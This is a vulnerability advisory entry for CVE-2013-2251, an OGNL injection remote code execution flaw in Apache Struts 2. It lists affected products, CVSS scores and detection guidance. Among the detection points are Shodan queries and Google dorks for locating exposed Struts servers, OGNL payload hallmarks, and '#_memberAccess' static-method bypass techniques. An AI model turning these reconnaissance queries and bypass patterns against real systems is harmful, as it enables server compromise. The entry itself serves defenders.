CVE-2013-2251
published 2013-07-20


Severity: critical, CVSS 3.1 base score 9.8
CISA Known Exploited Vulnerability (remediation due 2022-04-15); exploited in the wild
EPSS: 100.00% (100.0th percentile)
Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

Affected

10 ranges

Vendor    Product                                          Version range     Fixed in
apache    archiva
apache    archiva
apache    archiva                                          >= 1.3 < 1.3.8    1.3.8
apache    struts                                           2.0.0 – 2.3.15
cisco     products
fujitsu   interstage_business_process_manager_analytics
fujitsu   interstage_business_process_manager_analytics
oracle    siebel_apps_e-billing
oracle    siebel_apps_e-billing
oracle    siebel_apps_e-billing

Detection & IOCs (extracted from sources)

Detection regex (command-output signature): ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)
  • Alert on HTTP responses with status 302 where the Location header reflects evaluated OGNL expression output (e.g., arithmetic results or file path strings), indicating successful OGNL injection via redirect: prefix.
  • Use Shodan queries to identify exposed Apache Struts instances as potential targets: search for 'http.html:"apache struts"', 'http.title:"struts2 showcase"', or 'http.html:"struts problem report"'.
  • Use Google dork 'ext:action | filetype:action' or 'intitle:"struts2 showcase"' to identify publicly exposed Struts 2 action endpoints.
  • Monitor HTTP responses for uid/gid output patterns matching the regex ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\) in the response body, indicating successful OS command execution via OGNL injection.
  • Flag HTTP requests to .action endpoints where query parameters contain URL-encoded OGNL constructs referencing 'ProcessBuilder', 'Runtime', 'getInputStream', or 'HttpServletResponse' — all hallmarks of this exploit's RCE payload.
  • Detect attempts to bypass static method access restrictions in OGNL by monitoring for '#_memberAccess' manipulation patterns in HTTP parameters, including both property-level ('allowStaticMethodAccess') and object-replacement techniques.
  • The 'action:' prefix can only be used for exploitation if wildcard mapping is enabled in the Struts 2 configuration; 'redirect:' and 'redirectAction:' are not constrained by configuration and are universally exploitable on DefaultActionMapper.
  • All Struts 2 applications using DefaultActionMapper are vulnerable regardless of whether the application was designed to accept prefixed parameters, because prefixed parameters forcefully override application behavior.
  • After upgrading to the patched version, 'redirect:' and 'redirectAction:' parameters are completely dropped and no longer functional, which may cause compatibility issues for applications relying on these features.
  • The static method access bypass via '#_memberAccess["allowStaticMethodAccess"]=true' was patched in Struts 2.3.14.2, but alternative techniques (reflection-based or object replacement) remain viable in later vulnerable versions up to 2.3.15.

CVSS provenance

Source        Version   Score   Severity   Vector
nvd           v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd           v2.0      9.3     CRITICAL   AV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck               9.8     CRITICAL
cisa                    9.8     CRITICAL
vendor_cisco            10.0    CRITICAL